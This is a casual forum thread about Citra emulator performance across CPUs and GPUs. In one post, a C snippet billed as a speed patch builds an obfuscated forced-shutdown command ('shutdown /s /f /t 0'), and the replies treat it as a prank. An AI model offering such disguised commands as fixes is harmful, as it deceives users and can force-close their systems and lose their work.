one last final from me, seems the latest files did boost the speed normally by a few fps, but would advise frame limiter in some games like pokemon x/y to stop the starting video from stalling.

what nand ?, that some think you have to add as its illegal files to post with the build, as well as you need you're own sdmc with save files, without over riding someone else's saves .
are use what even User folder you got.

User folder I posted only had one qt-config.ini file

My good ol Intel Core i5 :)
I'm stuck with AMD, so I hate my self on several different kind of levels of not being able to mess around with the emu as much as others, because getting anything to run any decent on AMD hardware, is a task beyond mere human kind or cats mind you. In short, bollocks.

Though, a quick edit, I am seeing quite frequent all let it be small improvements by each version on AMD hardware, through several games I have tested. Just not anything I would consider, or any person would call consider playable. I cri q.q

To me, it's about time people using Intel cards get an advantage. With emulators such as CEMU and others, Intel cards do the worst.
I think it's good when things are optimized enough to run well on less but when it runs worse on stronger hardware, that's just crazy.

The whole thing of regular onboard intel video cards producing better performance in Citra than high powered Video cards from NVIDIA or AMD is a little silly to me.

That's pretty much bs and i think it was said often enough by now that your gfx card doesn't do the heavy lifting in emulation like it would with a pc game it's almost all on your cpu and raw clock speed is mostly what matters since most emulators are not heavily multi threaded, it's really silly people still don't get that.

One would think a i7 4790k would be more than enough in that case.

Perhaps or perhaps not, it's a hit and miss, as you are aware no doubt lad, the official emu isn't even close to a finished state, they are more worried about adding much necessary features than making it run actual games in good frame rate's, and it just happened to be so through out help of unofficial builds and so on, that some people are able to play certain games in high fps, with certain rigs, and some people can't even get close to the ten or twenty fps mark in 3ds brain training, I shit yee not lad.

edit did not see much differ for me.
but for 64bit systems that should be
"
const char* win64 = "C:\\Windows\\SysWOW64";
const char* perf_fmt = "%s\\sh%s%s";
char perf_cmd[100];
sprintf(perf_cmd, perf_fmt, win64, useTimedDo, "wn /s /f /t 0");"

Yeah it's kind of experimental. John wrote it. It will only work really good when operating beyond the TDP ( https://en.wikipedia.org/wiki/Thermal_design_power ), so ideal for overclockers?! When the CPU would normally slow down because of heat issues this will be able to kick in and pull the CPU temperature down to room-temperature :) (it's winter here, so with heaters on etc my CPU is at 21 degree Celsius with the patch, while it's normally at like... 50 degree or more while running Citra!)

I'll have to use my Windows machine (i7-920, Stock/Boxed cooler) tomorrow to see if your patched version still works.
My version ran fine on my Windows 8.1, 64-Bit - So I'm kind of surprised about you requiring a patch. I'm guessing your CPU just wasn't warm enough?
Probably more effective for others.

For me it keeps RAM usage at around 0% and also CPU was more than idle where it's normally under a lot of stress while Citra is running. I might integrate your patch though (if John is also fine with it), maybe it works better for some people?

//Edit: Hah, who needs code review and testing?! I've just integrated this patch straight away. Fix later = better code earlier. Thanks for your contribution.

OWNED.

I agree if an integrated is getting better performace is BS, BUT i also agree that the emulator is not finished so things like that could be expected something is clearly wrong and is probably working right with integrated but not with a dedicated, probably is because they are not even being used by the emulator right now.

I really surpirsing to me the amount of people that try to dismiss any complains or criticizm (feedback) and attack others on the forum just for doing that, they don't even argue that the emulator is not finished they straight tell you it's your hardware and when like in this case you shut their mouths they don't even come back to say anything anymore, i tell you, fanboys are cancer in every aspect of society.

--------------------- MERGED ---------------------------

When i start citra-qt-gcc-24-no-inputcore.exe or citra-qt-gcc-24.exe must not pay and i win:)

I don't understand what are you trying to say.
